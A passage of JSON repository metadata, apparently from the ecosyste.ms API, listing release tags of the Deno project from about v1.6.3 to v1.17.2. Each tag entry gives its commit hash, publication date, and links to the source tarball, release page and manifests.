22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0